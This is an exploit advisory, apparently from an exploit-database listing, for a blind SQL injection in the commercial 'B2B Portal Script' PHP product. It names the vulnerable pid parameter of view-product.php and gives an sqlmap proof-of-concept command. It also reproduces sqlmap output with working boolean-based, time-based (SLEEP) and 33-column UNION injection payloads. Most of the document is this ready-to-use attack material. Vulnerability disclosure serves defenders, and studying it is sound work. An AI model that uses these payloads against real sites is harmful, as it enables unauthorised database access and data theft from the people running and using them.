B2B Portal Script - Blind SQL Injection Vulnerability

2018-06-03
ID: 98202
CVE: None
Download vulnerable application: None
[x]========================================================================================================================================[x]
 | Title    : B2B Portal Script Blind SQL Vulnerabilities
 | Software : B2B Portal Script
 | Vendor   : http://www.i-netsolution.com/
 | Demo         : http://www.i-netsolution.com/item/b2b-portal-script/live_demo/190275
 | Date         : 06 October 2016
 | Author   : OoN_Boy
[x]========================================================================================================================================[x]
         [x]========================================================================================================================================[x]
 | Technology       : PHP
 | Database     : MySQL
 | Price        : $ 249
 | Description      : Have an idea about starting your own Alibaba clone website and thinking how to implement it? Our B2B Portal Script
              is the platform to transform your idea into the practical world. It is developed in PHP and MySQL and can help global
              portals to manage their online transactions with efficiency
[x]========================================================================================================================================[x]
      [x]========================================================================================================================================[x]
 | Exploit  : http://localhost/advancedb2b/view-product.php?pid=294'
 | Aadmin Page  : http://localhost/[path]/admin/index.php  
[x]========================================================================================================================================[x]
         [x]========================================================================================================================================[x]
 | Proof of concept : sqlmap -u "http://localhost/advancedb2b/view-product.php?pid=294"
[x]========================================================================================================================================[x] 
  ---
Parameter: pid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=294' AND 1754=1754 AND 'whqn'='whqn
      Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: pid=294' AND SLEEP(5) AND 'nGqC'='nGqC
      Type: UNION query
    Title: Generic UNION query (NULL) - 33 columns
    Payload: pid=294' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178766b71,0x656f5962547177636a47435158754754736267535a4d515a4d4c454e535052496652505243795849,0x7176626271),NULL,NULL-- lwGp
---
1-4-2 (www02)